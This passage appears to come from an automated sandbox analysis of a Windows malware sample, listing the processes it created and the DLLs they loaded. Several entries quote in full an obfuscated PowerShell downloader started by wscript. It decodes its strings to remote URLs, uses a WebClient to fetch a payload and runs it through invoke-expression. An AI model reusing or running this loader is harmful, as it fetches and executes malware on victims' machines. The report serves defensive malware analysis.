ts';$Splser+=Emissionskursers 'lainer5Lystba.Tr.mas0Centra Polyba(AbysmtW Smarti stivnSkur.adAfhoppoHus arwTufstesTnds i .ootdaNKldedrTMeroga Chelon1F reca0Diammi.Forbru0Kurede;Transp ProspeW BuskpiTryksanDroum.6Indfle4Bag,li;Glycer Susc.px ingm6 G ran4Sh ysi;Succul SamfunrPrespavNazifi:Se isa1Mellem3Jarbot4Inter .Idioch0 yperf) Voter In arbGAkkompeHitheoc unsankPortlioTskede/Grimac2Bidd t0collar1wor.le0Ov rbr0Macken1Murder0Eccles1Molli .parlaFbandaiiScandirSimulteUnwilffSpringo SpankxDendri/Larees1Ove,be3Auricu4Subaci.Seizu,0';$Garcon72=Emissionskursers 'CircumU eceles likkeT,enstRKabe l-UnconfABekranGK.sserepipefinChapout';$autogiro=Emissionskursers ' Pro,th Vir etArvef tOverstpNabobisOrdina:benefi/ Objec/ Afta.kOmegnsa Mi terSprjteu orepon PretiaFu ktivMorbi.rAftalei Enco.kMuch osHematohCaravaaEkspon. Con uo CheckrMetallgGarder/Quilk i One.em Mu tiaHelvetgReagiceApo.tasStorag/Ste nfiCorpornAftrapnBe oyao afvrgcJ dingeumlautnBourg c .esube Nonde.MarskamArts,lsRaglanopiassa>SortiehSublimt Pleurt Tinc p mpede:Levned/Bescra/D wnloaChola.lMaaleshFotostaBlotttlNephroaBagloklUnciv,a ulils AtteniOccamia Helbr.Sonateo FrimrrPla.ssgUnmora/ Denias EndrgeFlewspaFattilrOu,voicAftenshMerge /Mi iciiWalisen MashrnUnfrozoLegi ncNonth.ePrefernReauthcDet cheRntgen.ThreapmHoftehsFritimo';$Blokregistreringerne=Emissionskursers ' Aari,>';$Hjlpelsestes=Emissionskursers ' Frysei nonimeultratX';$Radiata='Gennemkre';$Bevbne='\Motorgadens.Alb';Meyers (Emissionskursers 'Kro.us$ NglevgLicansLFrilufoBo friBgio ita Dekl.lTakk l:Ult aiaBindebnRenipuA PrelaN San,bASursumSKreditenonv,srBedstenHvssesE Udp sSBortkr=Af eud$Scle,oEArgusbnForgrev Oenol: Paa.ia Homo p ntermp,uperaD Ta tfaPreflat A g
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Philologer='func';Get-History;$Philologer+='t';Get-History;$Philologer+='i';$Stttevvenes=Get-History;$Philologer+='on:';$Stttevvenes=Get-History;(ni -p $Philologer -n Emissionskursers -value { param($Flavourfully);$Modstillingens=6;do {$Metallographically+=$Flavourfully[$Modstillingens];$Modstillingens+=7} until(!$Flavourfully[$Modstillingens])$Metallographically});(ni -p $Philologer -n Meyers -value {param($Gestikulerende);.($Hjlpelsestes) ($Gestikulerende)});ConvertTo-Html;$Unlaboring=Emissionskursers 'MaanedNWro,gieRapturtUst la.EmbersW';$Unlaboring+=Emissionskursers ' Ghe tEHhvsysbModstacSlightLRykke IS.lvove TransnUvir,eT';$Splser=Emissionskursers 'revaliMRappegoHeliorzHo,fbeiregteulSedestlOverasaPred.c/';$Tilbindes=Emissionskursers 'FrenesTA arthlEcuadosReg,on1 Holly2';$Xenon='Sahari[Zigge,N andepebruu sTUnpriv.CeylonsDealmaesignifrdisembVAfmaaliafsondCHeuvelekomm.npPalladoUdskivISprednnFairl tForsulMAkkordaDe imaNMobiliALb.inggOverheeje aldRKerne.]Myster:Sikk r:SvejtsSEnfeebe ilsacPostkauErythrrD.zzieIHelmedTTwankmYInvtunpRe.ksaR NoninOSubgovt nmesmOT ldvsCEpideroS.xtanL Tphst=Endowm$ ec estTot enI AnisoLInsultB rugeriB aujoN AfhenD Ej ndEKara ts';$Splser+=Emissionskursers 'lainer5Lystba.Tr.mas0Centra Polyba(AbysmtW Smarti stivnSkur.adAfhoppoHus arwTufstesTnds i .ootdaNKldedrTMeroga Chelon1F reca0Diammi.Forbru0Kurede;Transp ProspeW BuskpiTryksanDroum.6Indfle4Bag,li;Glycer Susc.px ingm6 G ran4Sh ysi;Succul SamfunrPrespavNazifi:Se isa1Mellem3Jarbot4Inter .Idioch0 yperf) Voter In arbGAkkompeHitheoc unsankPortlioTskede/Grimac2Bidd t0collar1wor.le0Ov rbr0Macken1Murder0Eccles1Molli .parlaFbandaiiScandirSimulteUnwilffSpringo SpankxDendri/Larees1Ove,be3Auricu4Subaci.Seizu,0';$Garcon72=Emissionskursers 'CircumU eceles likkeT,enstRKabe l-UnconfABekranGK.sserepipefinChapout';$autogiro=Emissionskursers ' Pro,th Vir etArvef tOverstpNabobisOrdina:benefi/ Objec/ Afta.kOmegnsa Mi terSprjteu orepon PretiaFu ktivMorbi.rAftalei Enco.kMuch osHematohCaravaaEkspon. Con uo CheckrMetallgGarder/Quilk i One.em Mu tiaHelvetgReagiceApo.tasStorag/Ste nfiCorpornAftrapnBe oyao afvrgcJ dingeumlautnBourg c .esube Nonde.MarskamArts,lsRaglanopiassa>SortiehSublimt Pleurt Tinc p mpede:Levned/Bescra/D wnloaChola.lMaaleshFotostaBlotttlNephroaBagloklUnciv,a ulils AtteniOccamia Helbr.Sonateo FrimrrPla.ssgUnmora/ Denias EndrgeFlewspaFattilrOu,voicAftenshMerge /Mi iciiWalisen MashrnUnfrozoLegi ncNonth.ePrefernReauthcDet cheRntgen.ThreapmHoftehsFritimo';$Blokregistreringerne=Emissionskursers ' Aari,>';$Hjlpelsestes=Emissionskursers ' Frysei nonimeultratX';$Radiata='Gennemkre';$Bevbne='\Motorgadens.Alb';Meyers (Emissionskursers 'Kro.us$ NglevgLicansLFrilufoBo friBgio ita Dekl.lTakk l:Ult aiaBindebnRenipuA PrelaN San,bASursumSKreditenonv,srBedstenHvssesE Udp sSBortkr=Af eud$Scle,oEArgusbnForgrev Oenol: Paa.ia Homo p ntermp,uperaD Ta tfaPreflat A g
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Philologer='func';Get-History;$Philologer+='t';Get-History;$Philologer+='i';$Stttevvenes=Get-History;$Philologer+='on:';$Stttevvenes=Get-History;(ni -p $Philologer -n Emissionskursers -value { param($Flavourfully);$Modstillingens=6;do {$Metallographically+=$Flavourfully[$Modstillingens];$Modstillingens+=7} until(!$Flavourfully[$Modstillingens])$Metallographically});(ni -p $Philologer -n Meyers -value {param($Gestikulerende);.($Hjlpelsestes) ($Gestikulerende)});ConvertTo-Html;$Unlaboring=Emissionskursers 'MaanedNWro,gieRapturtUst la.EmbersW';$Unlaboring+=Emissionskursers ' Ghe tEHhvsysbModstacSlightLRykke IS.lvove TransnUvir,eT';$Splser=Emissionskursers 'revaliMRappegoHeliorzHo,fbeiregteulSedestlOverasaPred.c/';$Tilbindes=Emissionskursers 'FrenesTA arthlEcuadosReg,on1 Holly2';$Xenon='Sahari[Zigge,N andepebruu sTUnpriv.CeylonsDealmaesignifrdisembVAfmaaliafsondCHeuvelekomm.npPalladoUdskivISprednnFairl tForsulMAkkordaDe imaNMobiliALb.inggOverheeje aldRKerne.]Myster:Sikk r:SvejtsSEnfeebe ilsacPostkauErythrrD.zzieIHelmedTTwankmYInvtunpRe.ksaR NoninOSubgovt nmesmOT ldvsCEpideroS.xtanL Tphst=Endowm$ ec estTot enI AnisoLInsultB rugeriB aujoN AfhenD Ej ndEKara ts';$Splser+=Emissionskursers 'lainer5Lystba.Tr.mas0Centra Polyba(AbysmtW Smarti stivnSkur.adAfhoppoHus arwTufstesTnds i .ootdaNKldedrTMeroga Chelon1F reca0Diammi.Forbru0Kurede;Transp ProspeW BuskpiTryksanDroum.6Indfle4Bag,li;Glycer Susc.px ingm6 G ran4Sh ysi;Succul SamfunrPrespavNazifi:Se isa1Mellem3Jarbot4Inter .Idioch0 yperf) Voter In arbGAkkompeHitheoc unsankPortlioTskede/Grimac2Bidd t0collar1wor.le0Ov rbr0Macken1Murder0Eccles1Molli .parlaFbandaiiScandirSimulteUnwilffSpringo SpankxDendri/Larees1Ove,be3Auricu4Subaci.Seizu,0';$Garcon72=Emissionskursers 'CircumU eceles likkeT,enstRKabe l-UnconfABekranGK.sserepipefinChapout';$autogiro=Emissionskursers ' Pro,th Vir etArvef tOverstpNabobisOrdina:benefi/ Objec/ Afta.kOmegnsa Mi terSprjteu orepon PretiaFu ktivMorbi.rAftalei Enco.kMuch osHematohCaravaaEkspon. Con uo CheckrMetallgGarder/Quilk i One.em Mu tiaHelvetgReagiceApo.tasStorag/Ste nfiCorpornAftrapnBe oyao afvrgcJ dingeumlautnBourg c .esube Nonde.MarskamArts,lsRaglanopiassa>SortiehSublimt Pleurt Tinc p mpede:Levned/Bescra/D wnloaChola.lMaaleshFotostaBlotttlNephroaBagloklUnciv,a ulils AtteniOccamia Helbr.Sonateo FrimrrPla.ssgUnmora/ Denias EndrgeFlewspaFattilrOu,voicAftenshMerge /Mi iciiWalisen MashrnUnfrozoLegi ncNonth.ePrefernReauthcDet cheRntgen.ThreapmHoftehsFritimo';$Blokregistreringerne=Emissionskursers ' Aari,>';$Hjlpelsestes=Emissionskursers ' Frysei nonimeultratX';$Radiata='Gennemkre';$Bevbne='\Motorgadens.Alb';Meyers (Emissionskursers 'Kro.us$ NglevgLicansLFrilufoBo friBgio ita Dekl.lTakk l:Ult aiaBindebnRenipuA PrelaN San,bASursumSKreditenonv,srBedstenHvssesE Udp sSBortkr=Af eud$Scle,oEArgusbnForgrev Oenol: Paa.ia Homo p ntermp,uperaD Ta tfaPreflat A g	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
